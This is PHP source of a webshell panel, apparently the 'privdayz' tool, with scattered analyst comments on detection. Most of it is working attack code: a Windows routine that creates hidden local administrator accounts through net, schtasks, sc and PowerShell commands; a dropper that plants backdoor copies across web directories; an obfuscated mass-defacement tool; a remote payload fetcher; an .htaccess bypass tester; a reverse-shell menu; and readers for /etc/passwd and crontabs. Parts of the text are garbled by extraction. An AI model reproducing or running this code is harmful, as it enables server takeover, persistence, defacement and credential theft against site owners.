'/\$\w{1,15}\s*=\s*chr\s*\(/i', '/\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*[\'"]{0,1}\w+[\'"]{0,1}\s*\]/i', '/c99sh/i','/b374k/i','/WSO\sv\d+/i','/FilesMan/i','/phpshell/i','/IndoXploit/i', '/GIF89a.*<\?php/s','//is', '/file_put_contents\s*\(/i','/fwrite\s*\(/i','/chmod\s*\(/i', '/\x00/', '/union\s+select/i', '/outfile/i', '/load_file\s*\(/i', '/auto_prepend_file/i','/auto_append_file/i', '/proc\/self\/environ/i','/tmp\/sess_/i','/tmp\/php/i', '/\b(?:hack|shell|root|admin|bypass|safe_mode|fuck|god|antichild|sex|r57|c99|sh|ws|wso|backdoor|webshell|phpinfo|phpspy|spyshell|jindoshell|madspot|godzilla|cmd)\b/i', '/src\s*=\s*["\'].*?\.ru\//i', '/document\.write\s*\(/i','/unescape\s*\(/i', '/window\.location\s*=/i','/onerror\s*=/i','/onload\s*=/i', '/os\.system\s*\(/i','/subprocess\.Popen/i','/import\s+os/i' ]; if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_POST['fhscan'])) { $scan = trim($_POST['fhscan']); $max_results = 3333; $count = 0; $scan_files = 0; $found = 0; $results = []; echo "
Scanning...
"; $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan, FilesystemIterator::SKIP_DOTS)); $max_files = 5000; $count = 0; foreach ($rii as $file) { if (++$count > $max_files) break; if ($scan_files >= 100000) break; if (!$file->isFile() || $file->getSize()>12*1024*1024 || !$fx['is_readable']($file->getPathname())) continue; $scan_files++; $content = @$fx['fopen']($file->getPathname(),"r"); if (!$content) continue; $first_chunk = fread($content, 65536); // 64kb $fx['fclose']($content); foreach ($patterns as $pattern) { if ($fx['preg_match']($pattern, $first_chunk)) { $results[] = [ 'path'=>$file->getPathname(), 'size'=>$fx['fsize']($file->getPathname()), 'mtime'=>date("Y-m-d H:i",$fx['ftime']($file->getPathname())), 'match'=>$pattern ]; $found++; break; } } if ($scan_files % 150 == 0) { echo ""; } if ($found >= $max_results) break; } unset($file); unset($rii); echo ""; if (!$results) { echo '
Clean! No suspicious/backdoor files found.
'; } else { echo '
'; echo ''; foreach ($results as $row) { echo ''; } echo '
FileSizeLast ModifiedMatch
'.htmlspecialchars($row['path']).' '.number_format($row['size']/1024,2).' KB '.$row['mtime'].' '.htmlspecialchars(substr($row['match'],0,55)).'
'; } if (isset($_POST['showf'])) { $p = $_POST['showf']; if ($fx['is_readable']($p)) { $cnt = @file_get_contents($p, false, null, 0, 4096*4); echo '
'.htmlspecialchars($p).'
'; echo ''; } } } ?>
"SET NAMES utf8mb4", PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION ]); } } catch(Exception $ex) { $sqlerr = $ex->getMessage(); } ?>
mini sql admin
query("SHOW DATABASES")->fetchAll(PDO::FETCH_COLUMN); $selected_db = $mysql_db ?: $dbs[0] ?? ''; if (!$mysql_db && $selected_db) $pdo->query("USE $selected_db"); $tables = $pdo->query("SHOW TABLES")->fetchAll(PDO::FETCH_COLUMN); $selected_table = $_POST['table'] ?? $tables[0] ?? ''; $cols = $rows = []; $totalRows = 0; if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['save_rows'])) { foreach ($_POST['row']??[] as $rowidx => $vals) { $set = []; $where = []; foreach ($vals as $colname => $val) $set[] = "$colname=" . $pdo->quote($val); foreach ($cols as $col) $where[] = "{$col['Field']}=" . $pdo->quote($_POST['orig'][$rowidx][$col['Field']]); $pdo->exec("UPDATE $selected_table SET " . join(', ', $set) . " WHERE " . join(' AND ', $where) . " LIMIT 1"); } $infoMsg = '
Saved!
'; } if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['delete_row'])) { $i = (int)$_POST['delete_row']; $keys = array_keys($_POST['orig'][$i]??[]); $where = []; foreach ($keys as $key) $where[] = "$key=" . $pdo->quote($_POST['orig'][$i][$key]); $pdo->exec("DELETE FROM $selected_table WHERE " . join(' AND ', $where) . " LIMIT 1"); $infoMsg = '
Deleted!
'; } if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['add_row'])) { $insert = []; foreach ($_POST['add'] as $k => $v) $insert[$k] = $v; $colsx = join(',', array_map(function($x){return "$x";}, array_keys($insert))); $valsx = join(',', array_map(function($v) use($pdo){return $pdo->quote($v);}, $insert)); $pdo->exec("INSERT INTO $selected_table ($colsx) VALUES ($valsx)"); $infoMsg = '
Inserted!
'; } if ($selected_table) { $cols = $pdo->query("SHOW COLUMNS FROM $selected_table")->fetchAll(PDO::FETCH_ASSOC); $st = microtime(true); $totalRows = $pdo->query("SELECT COUNT(*) FROM $selected_table")->fetchColumn(); $rows = $pdo->query("SELECT * FROM $selected_table LIMIT ".(($page-1)*$pageSize).",$pageSize")->fetchAll(PDO::FETCH_ASSOC); $queryTime = microtime(true) - $st; } ?>
$row): ?>
Actions
1): ?>
Page / ( rows)
Query: s
ultra admin creator bypass (Windows/2025) - by privdayz.com
&1'); if (preg_match('/PortNumber\s+REG_DWORD\s+0x([0-9a-f]+)/i', $reg, $m)) { return hexdec($m[1]); } $netstat = pr1vd4yzC('netstat -an | find ":3389"'); if (strpos($netstat, '3389') !== false) { return 3389; } return 'Unknown'; } $rdp_port = detect_rdp_port(); echo "
RDP Port: " . htmlspecialchars($rdp_port) . "
"; ?>
&1');
    if (trim($out)) return $out;
    $fallback = "timeout /T $timeout /NOBREAK & $cmd";
    $out2 = pr1vd4yzC($fallback.' 2>&1');
    if (trim($out2)) return $out2;
    return pr1vd4yzC($cmd.' 2>&1');
}
// Analyst annotation (code below is unchanged).
// Purpose: on a POST carrying `user` and `pass`, build a list of Windows
// command lines that each try to create a local account and add it to the
// Administrators group, run them in order, and stop at the first whose output
// looks successful. The outcome and the credentials are kept in the session.
//
// Host artefacts named in the command strings: scheduled tasks "winrrrrrr00t"
// and "winr00t2", service "p0wnsvc", and the Winlogon "AutoAdminLogon" value.
//
// Detection: the commands go through prvd_exec_with_timeout(), which is
// defined outside this block; assuming it executes them from the PHP process,
// the primary signal is process-creation telemetry showing net, schtasks, sc,
// reg, at, cmd or powershell as children of the web-server worker. Windows
// Security events 4720 (account created) and 4732 (member added to a local
// group) record the account change itself.
//
// Mitigation: a web worker running under an account without local
// administrator rights cannot complete any of these commands.

// Session state for this feature: a success flag plus the last user name and
// password used. Defaults are written only when the keys are absent.
if (!isset($_SESSION['pr1vd4yz_winr00t_success'])) $_SESSION['pr1vd4yz_winr00t_success'] = false;
if (!isset($_SESSION['pr1vd4yz_winr00t_user'])) $_SESSION['pr1vd4yz_winr00t_user'] = '';
if (!isset($_SESSION['pr1vd4yz_winr00t_pass'])) $_SESSION['pr1vd4yz_winr00t_pass'] = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['user'],$_POST['pass'])) {
    // User name is reduced to letters, digits, underscore and hyphen.
    $u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['user']);
    // Password is taken verbatim from the request and interpolated into every
    // command string below, so it appears in clear text wherever command
    // lines are logged (process-creation auditing with command-line capture).
    $p = $_POST['pass'];
    // $mode is read here but not referenced again in this block.
    $mode = $_POST['mode'] ?? 'auto';
    $success = false;
    // Each entry is [label shown to the operator, command line to run].
    $methods = [];

    $methods[] = [
        "[*] net user (classic)",
        "net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add"
    ];

    $methods[] = [
        "[*] PowerShell (background)",
        "powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\""
    ];

    // Fixed task name "winrrrrrr00t"; scheduled-task creation auditing
    // (event 4698, where enabled) records it.
    $methods[] = [
        "[*] schtasks",
        "schtasks /create /tn winrrrrrr00t /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System"
    ];

    $methods[] = [
        "[*] at.exe",
        "at 12:00 cmd.exe /c \"net user $u $p /add && net localgroup Administrators $u /add\""
    ];

    // Fixed service name "p0wnsvc"; service installation is logged as
    // event 7045 in the System log.
    $methods[] = [
        "[*] sc service hack",
        "sc create p0wnsvc binPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto"
    ];

    // This entry only sets AutoAdminLogon to 1 under Winlogon; the command
    // contains no account creation.
    $methods[] = [
        "[*] Registry AutoAdminLogon",
        "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f"
    ];

    $methods[] = [
        "[*] Fallback CMD",
        "cmd /c net user $u $p /add & net localgroup Administrators $u /add"
    ];

    $methods[] = [
        "[*] PowerShell Script Chain",
        "powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\""
    ];

    // Second fixed task name, "winr00t2", triggered at logon.
    $methods[] = [
        "[*] Task Scheduler V2 (schtasks)",
        "schtasks /create /tn winr00t2 /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onlogon /ru System"
    ];

    // Run the entries in order; wout() (defined elsewhere) receives the label
    // and the raw command output.
    foreach ($methods as $step) {
        list($label, $cmd) = $step;
        wout($label . "...");
        $res = prvd_exec_with_timeout($cmd, 9);
        wout($res);
        // "Success" is inferred only from case-insensitive substrings in the
        // output ('success', 'ok', 'ReturnValue = 0', 'başarı',
        // 'already exists'). It is not verification: responders should
        // confirm against the host's local accounts and events 4720/4732
        // rather than trust this flag.
        if (
            stripos($res, 'success') !== false || stripos($res, 'ok') !== false ||
            stripos($res, 'ReturnValue = 0') !== false ||
            stripos($res, 'başarı') !== false ||
            stripos($res, 'already exists') !== false
        ) {
            wout("[+] Admin user injected!");
            $success = true;
            break;
        }
        // One-second pause between attempts.
        sleep(1);
    }

    if ($success) {
        // User name and clear-text password are stored in the PHP session;
        // with a file-based session handler they would sit in session files
        // on disk, which are worth collecting during response (handler not
        // visible here, confirm on the host).
        $_SESSION['pr1vd4yz_winr00t_success'] = true;
        $_SESSION['pr1vd4yz_winr00t_user'] = $u;
        $_SESSION['pr1vd4yz_winr00t_pass'] = $p;
    wout("\n[+] 0wn3d! Admin user injected:\n[+] User: $u\n[+] Pass: $p");
    wout("[!] Info: Webshell cannot send commands as this user. Use RDP/SMB/WinRM with these credentials!");
    } else {
        $_SESSION['pr1vd4yz_winr00t_success'] = false;
        wout("\n[!] r00t failed :: no vector worked, permission denied.");
    }
}
if ($_SESSION['pr1vd4yz_winr00t_success']) {
    $u = $_SESSION['pr1vd4yz_winr00t_user'];
    $p = $_SESSION['pr1vd4yz_winr00t_pass'];
    ?>
    
[+] Running as  |  Pass:
 $cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\"";
        $out1 = pr1vd4yzC($scht.' 2>&1');
        wout($out1);

        pr1vd4yzC("schtasks /run /tn pzadmtask 2>&1");
        sleep(1);
        $output = @file_get_contents($cmdfile);
        if ($output && strlen($output) > 0) {
            wout("[+] Command executed as admin!\n" . $output);
            $success_cmd = true;
        }
        @pr1vd4yzC('schtasks /delete /tn pzadmtask /f 2>&1');
        @unlink($cmdfile);
        if (!$success_cmd) {
            wout("[*] Trying service method...");
            $svc = 'sc create pzadmsvc binPath= "cmd /c '.$c.' > '.$cmdfile.' 2>&1" obj= ".\\'.$u.'" password= "'.$p.'" start= demand';
            $out2 = pr1vd4yzC($svc.' 2>&1');
            wout($out2);
            pr1vd4yzC('sc start pzadmsvc 2>&1');
            sleep(1);
            $output2 = @file_get_contents($cmdfile);
            if ($output2 && strlen($output2) > 0) {
                wout("[+] Service method: Command executed as admin!\n" . $output2);
                $success_cmd = true;
            }
            @pr1vd4yzC('sc delete pzadmsvc 2>&1');
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[*] PowerShell fallback...");
            $pw = 'powershell -Command "Start-Process cmd -ArgumentList \'/c '.$c.' > '.$cmdfile.' 2>&1\' -Credential (New-Object System.Management.Automation.PSCredential(\''.$u.'\',(ConvertTo-SecureString \''.$p.'\' -AsPlainText -Force))) -WindowStyle Hidden"';
            $out3 = pr1vd4yzC($pw.' 2>&1');
            wout($out3);
            sleep(1);
            $output3 = @file_get_contents($cmdfile);
            if ($output3 && strlen($output3) > 0) {
                wout("[+] PowerShell: Command executed as admin!\n" . $output3);
                $success_cmd = true;
            }
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[!] Admin command failed. Try RDP / manual login?");
        }
    }
    ?>
    
b4ckd00r cr34t0r
".$ve5c970b653);}else{echo"RSS Error.";} ?> PHP; if (isset($_POST['create_bd'])) { $ana_dizin = rtrim($_SERVER['DOCUMENT_ROOT'] ?? getcwd(), '/'); $dirs = [$ana_dizin]; foreach (glob($ana_dizin . '/*', GLOB_ONLYDIR) as $d) $dirs[] = $d; shuffle($dirs); $adet = rand(5, 8); $secilen = array_slice($dirs, 0, $adet); function bd_write($yol, $icerik) { $fmethods = [ function($f, $c) { return @file_put_contents($f, $c)!==false; }, function($f, $c) { $h=@fopen($f,"w"); if($h){fwrite($h,$c);fclose($h); return true;} return false; }, function($f, $c) { return pr1vd4yzC("echo ".escapeshellarg($c)." > ".escapeshellarg($f)); } ]; foreach($fmethods as $fn) if ($fn($yol,$icerik)) return true; return false; } $sonuclar = []; foreach ($secilen as $klasor) { $file = rtrim($klasor, '/').'/pr1vd4yz.php'; $ok = bd_write($file, $fpr1vx); $url = str_replace($_SERVER['DOCUMENT_ROOT'],'',$file); if ($ok) $sonuclar[] = "[OK] $url"; else $sonuclar[] = "[FAIL] $file"; } echo "
"; echo "Drop edilen backdoor linkleri:
"; echo implode("
", $sonuclar); echo "
"; } ?>
WAF / Firewall / Reverse Proxy Detector
['server: cloudflare', 'cf-ray', 'cf-cache-status', '__cfduid', 'cloudflare-nginx'], 'Sucuri' => ['x-sucuri-id', 'x-sucuri-cache', 'x-sucuri'], 'ModSecurity' => ['mod_security', 'modsec', 'x-mod-sec'], 'Imunify360' => ['imunify360', 'x-imunify360'], 'w4f' => ['w4f', 'x-w4f'], 'OpenResty' => ['openresty'], 'AWS WAF' => ['awsalb', 'awselb', 'x-amzn'], 'Incapsula' => ['incapsula', 'x-cdn', 'x-iinfo'], 'StackPath' => ['stackpath'], 'Quttera' => ['quttera'], 'PerimeterX' => ['perimeterx'], 'Reblaze' => ['reblaze'], 'DDoS-Guard' => ['ddos-guard'], 'Fastly' => ['fastly'], 'NAXSI' => ['naxsi'], 'SafeDog' => ['safedog', 'waf.sid'], '360 Web Application Firewall' => ['360wzb', 'wzws-rid'], 'Baidu Yunjiasu' => ['yunjiasu'], 'Yunjiasu' => ['yunjiasu'], 'F5 BIG-IP' => ['bigip', 'f5-'], 'Barracuda' => ['barracuda'], 'Profense' => ['profense'], 'Akamai' => ['akamai', 'akamai-ghost'], 'FortiWeb' => ['fortiweb'], 'URLScan' => ['urlscan'], ]; $result = []; $err = false; $headers = @get_headers($rtfccq, 1); $all_hdr = ''; if ($headers && is_array($headers)) foreach ($headers as $k=>$v) { $all_hdr .= stealth_strtolower($k.': '.(is_array($v)?implode('; ',$v):$v))."\n"; } $body = @file_get_contents($rtfccq); $all_body = stealth_strtolower($body); foreach ($fw_map as $fw=>$patterns) { foreach ($patterns as $sig) { if (strpos($all_hdr, $sig)!==false || strpos($all_body, $sig)!==false) { $result[$fw]=true; break; } } } ?>
Scan results for:
$v) { echo ''; } } else { echo ''; } ?>
Firewall / Proxy Status
'.htmlspecialchars($fw).' Detected
No major WAF / reverse proxy detected.
mass def4ce t00l
WARNING: All matching files will be overwritten! (Max: 1000 files/run)
"\x31\60\62\54\x31\61\61\54\61\61\62\x2c\61\60\61\54\x31\61\60", "\x66\x69\x6c\x65\x5f\x70\165\164\x5f\x63\157\x6e\164\x65\x6e\164\163" => "\x31\x30\62\x2c\61\60\65\x2c\61\60\70\x2c\61\60\61\x2c\x39\65\54\61\x31\x32\x2c\x31\61\x37\54\x31\61\x36\54\x39\x35\x2c\x39\x39\x2c\x31\x31\x31\54\x31\61\x30\54\x31\61\66\x2c\x31\60\x31\54\x31\x31\60\54\61\x31\66\x2c\x31\61\x35", "\x73\150\x65\x6c\x6c\137\145\170\145\x63" => "\x31\61\x35\x2c\x31\x30\x34\x2c\61\60\61\54\61\60\70\54\61\x30\x38\54\x39\65\54\x31\60\x31\x2c\61\62\60\54\61\x30\x31\54\x39\x39", "\145\170\x65\143" => "\x31\x30\x31\54\61\62\x30\x2c\61\60\x31\54\x39\x39", "\163\171\x73\164\x65\x6d" => "\61\x31\65\54\x31\62\x31\54\x31\61\x35\x2c\x31\61\x36\x2c\x31\x30\61\x2c\x31\60\71", "\x70\141\163\x73\x74\x68\x72\165" => "\61\61\x32\x2c\71\x37\54\x31\x31\x35\54\61\61\65\x2c\61\61\66\54\x31\60\x34\x2c\61\61\64\x2c\61\61\67", "\160\x72\x6f\x63\x5f\x6f\160\x65\x6e" => "\61\61\62\x2c\61\x31\x34\x2c\61\x31\61\x2c\71\x39\54\x39\65\x2c\61\x31\61\x2c\x31\61\x32\54\61\60\x31\x2c\x31\x31\60", "\160\157\160\x65\x6e" => "\61\x31\62\x2c\61\x31\x31\54\x31\61\x32\54\61\x30\x31\x2c\61\x31\x30", "\x66\167\162\x69\164\145" => "\61\x30\x32\54\x31\61\x39\54\61\x31\64\54\61\60\x35\x2c\61\x31\66\x2c\61\60\x31", "\146\143\x6c\157\163\x65" => "\61\60\62\54\x39\x39\54\x31\60\x38\54\x31\x31\x31\x2c\x31\61\x35\x2c\x31\60\x31"); return isset($map[$n]) ? 
chDxzZ($map[$n]) : $n; } if (isset($_POST['s7bm1t_d3f'])) { $rtfccq = trim($_POST['d3f_f1l']); $pr1vd4yz_c0m = trim($_POST['d3f_r0']); $pyxox = $_POST['d3f_cont']; if (!$rtfccq || !$pr1vd4yz_c0m || !$pyxox) { echo ''; } else { $count = 0; $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($pr1vd4yz_c0m, FilesystemIterator::SKIP_DOTS)); $max_files = 1000; $count = 0; foreach ($rii as $file) { if ($count % 100 == 0) { flush(); } if (++$count > $max_files) break; if (strtolower($file->getFilename()) === strtolower($rtfccq)) { $fpath = $file->getPathname(); $status = ''; $method = ''; goto YU6B5; cdiUg: $fwrite = pr7xcz("\x66\167\162\x69\x74\145"); goto x9s7D; YU6B5: $fpXq = pr7xcz("\x66\x6f\x70\145\156"); goto cdiUg; x9s7D: $fclose = pr7xcz("\x66\143\154\x6f\x73\x65"); $fh = @$fpXq($fpath, 'wb'); if ($fh) { $fwrite($fh, $pyxox); $fclose($fh); $status = 'OK'; $method = 'fopen'; } goto WDSJf; pXxbn: if (!$status && function_exists(pr7xcz("\x70\x61\163\x73\164\150\x72\165"))) { $pr1cvxS = pr7xcz("\x70\141\163\x73\164\x68\x72\165"); $pr1pr1v = "\x65\x63\150\157\x20\47" . str_replace("\47", "\47\x5c\47\x27", $pyxox) . "\47\40\76\40" . escapeshellarg($fpath); @$pr1cvxS($pr1pr1v); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\113"; $method = "\x70\x61\163\x73\x74\150\162\165"; } } goto ASUGV; lo7km: if (!$status && function_exists(pr7xcz("\160\157\160\x65\156"))) { $popen = pr7xcz("\x70\157\160\x65\x6e"); $ph = @$popen("\x63\141\x74\x20\x3e\x20" . escapeshellarg($fpath), "\167"); if ($ph) { fwrite($ph, $pyxox); fclose($ph); } if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\113"; $method = "\x70\x6f\160\145\156"; } } goto RYZfv; cy3xC: if (!$status && function_exists(pr7xcz("\x73\x68\x65\x6c\154\137\x65\x78\x65\x63"))) { $shell_exec = pr7xcz("\163\150\x65\x6c\154\x5f\x65\170\x65\143"); $pr1pr1v = "\145\143\150\157\40\x27" . str_replace("\x27", "\47\x5c\x27\x27", $pyxox) . "\47\x20\x3e\x20" . 
escapeshellarg($fpath); @$chDx2x($pr1pr1v); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\x4b"; $method = "\163\150\145\154\154\137\x65\x78\145\143"; } } goto D1yZ2; D1yZ2: if (!$status && function_exists(pr7xcz("\x65\170\x65\143"))) { $exec = pr7xcz("\145\x78\145\x63"); $pr1pr1v = "\145\143\x68\157\40\47" . str_replace("\x27", "\x27\x5c\47\x27", $pyxox) . "\x27\40\x3e\40" . escapeshellarg($fpath); @$exec($pr1pr1v, $out, $rc); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\113"; $method = "\x65\170\145\x63"; } } goto SS_Lw; SS_Lw: if (!$status && function_exists(pr7xcz("\163\171\163\x74\145\x6d"))) { $system = pr7xcz("\163\171\x73\164\145\x6d"); $pr1pr1v = "\145\143\x68\x6f\40\x27" . str_replace("\x27", "\47\x5c\x27\47", $pyxox) . "\47\40\x3e\x20" . escapeshellarg($fpath); @$system($pr1pr1v); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\117\113"; $method = "\x73\171\163\x74\x65\x6d"; } } goto pXxbn; ASUGV: if (!$status && function_exists(pr7xcz("\x70\162\157\x63\137\x6f\160\145\156"))) { $proc_open = pr7xcz("\160\x72\x6f\143\137\157\160\x65\156"); $descs = array(array("\160\151\x70\145", "\x77"), array("\160\x69\160\x65", "\167"), array("\x70\x69\x70\145", "\167")); $process = @$proc_open("\x63\x61\x74\40\76\40" . 
escapeshellarg($fpath), $descs, $pipes); if (is_resource($process)) { fwrite($pipes[0], $pyxox); fclose($pipes[0]); $out = stream_get_contents($pipes[1]); fclose($pipes[1]); $err = stream_get_contents($pipes[2]); fclose($pipes[2]); proc_close($process); if (@filesize($fpath) >= strlen($pyxox) * 0.7) { $status = "\x4f\x4b"; $method = "\160\x72\157\143\x5f\157\160\145\156"; } } } goto lo7km; WDSJf: if (!$status && function_exists(pr7xcz("\146\151\x6c\145\137\160\165\164\137\x63\x6f\x6e\164\145\x6e\x74\163"))) { $file_put_contents = pr7xcz("\146\151\x6c\145\x5f\160\x75\x74\x5f\143\x6f\156\x74\x65\156\164\x73"); $ok = @$file_put_contents($fpath, $pyxox); if ($ok !== false) { $status = "\x4f\x4b"; $method = "\x66\151\154\145\x5f\x70\165\x74\x5f\143\157\x6e\164\x65\156\x74\x73"; } } goto cy3xC; RYZfv: if (!$status) { $status = 'FAIL'; $method = '-'; } $count++; echo ''; if ($count > 1000) break; } } unset($file); unset($rii); if ($count == 0) { echo ''; } } } else { echo ''; } ?>
# File Path Method Status
Input missing!
'.$count.' '.htmlspecialchars($fpath).' '.$method.' '.($status == 'OK' ? 'OK' : $status).'
No file found.
No operation yet.

root process watch

PID User CPU % MEM % Command Action

live net threats

protocol local address remote address status pid
[safe mode]
[d1s4bl3 f7nct1ons] None'; } else { echo '' . str_replace(",", ", ", $d1sxb) . ''; } ?>
[h0st]
[us3r]
[s0ftware]
[1p]
[php]
// Environment capability table shown in the panel header. The key of the first
// entry was lost when the page was extracted.
// Each integer list is a run of decimal ASCII codes; read as characters they
// spell a PHP function or ini name (decoded beside each entry). fobf() is
// defined elsewhere in the file and presumably performs that decoding; $fnX6
// presumably wraps function_exists() and $chDxXZx an ini lookup - confirm
// against the full sample.
// Detection note: names carried as numeric arrays and resolved at runtime do
// not match plain-string signatures, so a scanner has to match the decoder
// pattern itself or evaluate the decoded value.
function() use($fnX6) {
    $f = fobf([99,117,114,108,95,105,110,105,116]); // "curl_init"
    return $fnX6($f);
},
'SSH2' => function() use($fnX6) {
    $f = fobf([115,115,104,50,95,99,111,110,110,101,99,116]); // "ssh2_connect"
    return $fnX6($f);
},
'Magic Quotes' => function() use($chDxXZx) {
    $f = fobf([109,97,103,105,99,95,113,117,111,116,101,115,95,103,112,99]); // "magic_quotes_gpc"
    return (bool)$chDxXZx($f);
},
'MySQL' => function() use($fnX6) {
    $f1 = fobf([109,121,115,113,108,105,95,99,111,110,110,101,99,116]); // "mysqli_connect"
    $f2 = fobf([109,121,115,113,108,95,99,111,110,110,101,99,116]); // "mysql_connect"
    return $fnX6($f1) || $fnX6($f2);
},
'MSSQL' => function() use($fnX6) {
    $f1 = fobf([109,115,115,113,108,95,99,111,110,110,101,99,116]); // "mssql_connect"
    $f2 = fobf([115,113,108,115,114,118,95,99,111,110,110,101,99,116]); // "sqlsrv_connect"
    return $fnX6($f1) || $fnX6($f2);
},
'PostgreSQL' => function() use($fnX6) {
    $f = fobf([112,103,95,99,111,110,110,101,99,116]); // "pg_connect"
    return $fnX6($f);
},
'Oracle' => function() use($fnX6) {
    $f = fobf([111,99,105,95,99,111,110,110,101,99,116]); // "oci_connect"
    return $fnX6($f);
},
'CGI' => function() use($fn_php_sapi_name) {
    // True when PHP runs under the cgi or cgi-fcgi SAPI.
    $name = $fn_php_sapi_name();
    return ($name === 'cgi' || $name === 'cgi-fcgi');
},
];
// Evaluate every probe and print an ON/OFF flag per feature. $class is computed
// here, but the markup that presumably consumed it was stripped in extraction.
foreach ($features as $name => $fn) {
    $on = $fn() ? 'ON' : 'OFF';
    $class = $on === 'ON' ? 'pr1vd4yz-lite-on' : 'pr1vd4yz-lite-off';
    echo ''.$name.' : '.$on.' ';
}
?>
newFolder newFile
cPanel reset
reset cPanel password
×
close
backconnect shell
remote connection start (reverse shell)
×
go back
php mailer
send a message with smtp
×
php info
system php environment
×
]*>.*?#si', '#]*>|#i', '#]*>|#i', '#]*>|#i', '#]*>|#i', '#]*>|#i', '#]*>(.*?)#i', '##i', '#]*>|
#i', '#]*>|#i', ], [ '', '', '', '', '', '', '', '', '', '$1', "\n", '', '', '', '', ], $pinfo); $lines = preg_split('/\r?\n/', strip_tags($pinfo)); $lines = array_slice(array_filter(array_map('trim', $lines)), 0, 80); echo '
' . htmlspecialchars(implode("\n", $lines)) . '
'; ?>
disk info
disk usage & space
×
=1024 && ++$i) $b/=1024; return round($b,($i?1:0)).' '.$s[$i]; } ?>
Total Space:
Used Space:
Free Space:
% used
remote file upload
fetch remote file to server
×
&1", "curl -k -L " . escapeshellarg($url) . " -o " . escapeshellarg($path) . " 2>&1", "lynx -source " . escapeshellarg($url) . " > " . escapeshellarg($path) . " 2>&1", "fetch -o " . escapeshellarg($path) . " " . escapeshellarg($url) . " 2>&1", "busybox wget -O " . escapeshellarg($path) . " " . escapeshellarg($url) . " 2>&1", ]; foreach($shell_cmds as $cmd) { pr1vd4yzC($cmd); if(@file_exists($path) && @filesize($path)>0) { $ok = true; break; } } if(!$ok && function_exists('file_get_contents')) { $data = @file_get_contents($url); if($data && @file_put_contents($path, $data)!==false && @filesize($path)>0) $ok = true; } if(!$ok && function_exists('fopen')) { $rf = @fopen($url, "rb"); if($rf) { $wf = @fopen($path, "wb"); if($wf) { while(!feof($rf)) @fwrite($wf, fread($rf, 8192)); @fclose($wf); } @fclose($rf); if(@file_exists($path) && @filesize($path)>0) $ok = true; } } if(!$ok && function_exists('curl_init')) { $ch = @curl_init($url); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $data = @curl_exec($ch); @curl_close($ch); if($data && @file_put_contents($path, $data)!==false && @filesize($path)>0) $ok=true; } if(!$ok && stripos($url,'data:')===0) { $bs7y3q = substr($url, strpos($url, ',')+1); $decoded = pr1vdc($bs7y3q); if($decoded && @file_put_contents($path, $decoded)!==false && @filesize($path)>0) $ok=true; } if($ok){ echo'
success: saved!
'; }else{ echo'
failed to fetch document!
'; } endif; ?>
.htaccess bypass
Test protected file access with multi bypass (nullbyte, traversal, query...)
Enter relative path or full url
×
close
['method'=>'GET','timeout'=>3]]); $res = @file_get_contents($url, false, $ctx); $status = isset($http_response_header[0]) ? $http_response_header[0] : 'NO RESPONSE'; $short = strlen($res) ? substr(trim($res), 0, 80) : '-'; $results[] = [ 'method' => $try, 'status' => $status, 'snippet' => htmlspecialchars($short) ]; } ?>
Bypass Results
Variant Status Output
cron jobs
×
'; echo'
[root cron jobs]
'; $_fc=_prv_str([102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115]); $_rt=@$_fc('/etc/crontab'); if(!function_exists('_prv_rx_j9q')){function _prv_rx_j9q($c){ $_fx=[_prv_str([101,120,101,99]),_prv_str([115,121,115,116,101,109]),_prv_str([112,97,115,115,116,104,114,117])]; foreach($_fx as$_f){if(function_exists($_f)){@$_f($c);$_o="";if($_o)return$_o;}}return!1;}} if($_rt){echo'
'.htmlspecialchars($_rt).'
';}else{$_rs=_prv_rx_j9q('crontab -l 2>&1');echo'
'.htmlspecialchars($_rs).'
';} echo'
'; $_us=[];$_pf=@file('/etc/passwd'); if($_pf){foreach($_pf as$_l){$_ps=explode(':',$_l);if(isset($_ps[6])&&(strpos($_ps[6],'bash')!==!1||strpos($_ps[6],'sh')!==!1)){$_us[]=$_ps[0];}}} foreach($_us as$_u){if($_u=='root')continue;$_p1="/var/spool/cron/$_u";$_p2="/var/spool/cron/crontabs/$_u";$_cr='';if(file_exists($_p1))$_cr=@$_fc($_p1);elseif(file_exists($_p2))$_cr=@$_fc($_p2);else$_cr=_prv_rx_j9q("crontab -u $_u -l 2>&1");echo'
';echo'
'.$_u.'
';echo'
'.htmlspecialchars(trim($_cr)? : '[empty]').'
';echo'
';} ?>
